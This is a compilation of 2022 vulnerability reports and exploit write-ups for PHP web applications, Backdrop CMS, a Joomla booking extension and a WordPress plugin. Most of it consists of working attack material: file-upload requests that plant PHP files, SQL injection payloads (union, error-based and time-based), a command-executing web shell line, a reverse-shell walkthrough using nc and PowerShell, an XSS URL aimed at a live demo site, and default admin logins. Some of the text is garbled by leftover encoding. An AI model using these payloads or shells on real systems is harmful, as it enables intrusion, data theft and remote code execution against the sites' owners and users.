An arbitrary file upload vulnerability in the component /leave_system/classes/Users.php?f=save of Online Leave Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Leave Management System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: hegeoo

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability url: http://ip/leave\_system/classes/Users.php?f=save

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the "Create New" file of the "User list" module in the background management system

Request package for file upload：

POST /leave\_system/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=user/manage\_user
Content-Length: 809
Content-Type: multipart/form-data; boundary=---------------------------7128709111375
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
\-----------------------------7128709111375
Content-Disposition: form-data; name="id"
\-----------------------------7128709111375
Content-Disposition: form-data; name="firstname"
111
\-----------------------------7128709111375
Content-Disposition: form-data; name="lastname"
111
\-----------------------------7128709111375
Content-Disposition: form-data; name="username"
111
\-----------------------------7128709111375
Content-Disposition: form-data; name="password"
11
\-----------------------------7128709111375
Content-Disposition: form-data; name="type"
2
\-----------------------------7128709111375
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------7128709111375--

The files will be uploaded to this directory \\leave\_system\\uploads 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41379: bug_report/RCE-1.md at main · hegeoo/bug_report

Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editclient.php?id=.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: f0ward

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/editclient.php?id=

Vulnerability location: /diagnostic/editclient.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/editclient.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /diagnostic/editclient.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-42073: bug_report/SQLi-1.md at main · f0w4rD/bug_report

Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editcategory.php?id=.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: f0ward

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/editcategory.php?id=

Vulnerability location: /diagnostic/editcategory.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/editcategory.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /diagnostic/editcategory.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-42074: bug_report/SQLi-2.md at main · f0w4rD/bug_report

An arbitrary file upload vulnerability in the component /php_action/editFile.php of Online Diagnostic Lab Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Via

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/editFile.php?id=1

Loophole location: Online Diagnostic Lab Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/editorder.php?id=1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------269801976022857
Content-Length: 431
\-----------------------------269801976022857
Content-Disposition: form-data; name="old\_image"
Z614.pdf
\-----------------------------269801976022857
Content-Disposition: form-data; name="productImage"; filename="se.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------269801976022857
Content-Disposition: form-data; name="btn"
\-----------------------------269801976022857--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41512: bug_report/RCE-1.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_payment.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_payment

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_payment, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_payment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41515: bug_report/SQLi-2.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_loan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_loan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_loan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_loan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41514: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /diagnostic/edittest.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/edittest.php?id=

Vulnerability location: /diagnostic/edittest.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/edittest.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /diagnostic/edittest.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-41513: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Backdrop CMS 1.22.0 has Unrestricted File Upload vulnerability via 'themes' that allows attackers to Remote Code Execution.

**Description**

\# An Issue is discovered in Backdrop CMS 1.22.0.

#We found a vulnerability file upload when we upload the malicious file as a theme in the theme installer on the Apperance page.

**Proof of Concept**

First, we login to the target application with admin privileges.

Then select Appearance and select Install new themes.

click Manual Installation.

we can upload with zip files.

so we find themes files at github.

https://github.com/backdrop-contrib/

after that we use simple web shell and zip it to theme files.

<?php system($\_GET\[“cmd”\]); ?>

back too Manual installation and upload zip files.

Installed lateral successfully.

we use gobuster to find which path of themes.

after we know path we can access to the backdoor and execute “whoami” command.

use nc to get our reverse shell.

we use reverse shell payload from this website.

https://revshells.com

Finally execute “powershell” command to create reverse shell connection.

**Author**

Grim The Ripper Team by SOSECURE Thailand

CVE-2022-42092: Backdrop CMS 1.22.0 — Unrestricted File Upload (Themes)

Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Joomla Vik Booking 1.15.0 Cross Site Scripting

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

Tag

#php